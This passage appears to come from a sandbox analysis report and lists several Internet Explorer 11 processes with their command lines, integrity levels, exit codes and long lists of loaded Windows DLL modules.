c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll

PID
2912
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2136 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
2728
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
2800
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2728 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
908
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
2752
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:908 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
2488
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
1892
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2488 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
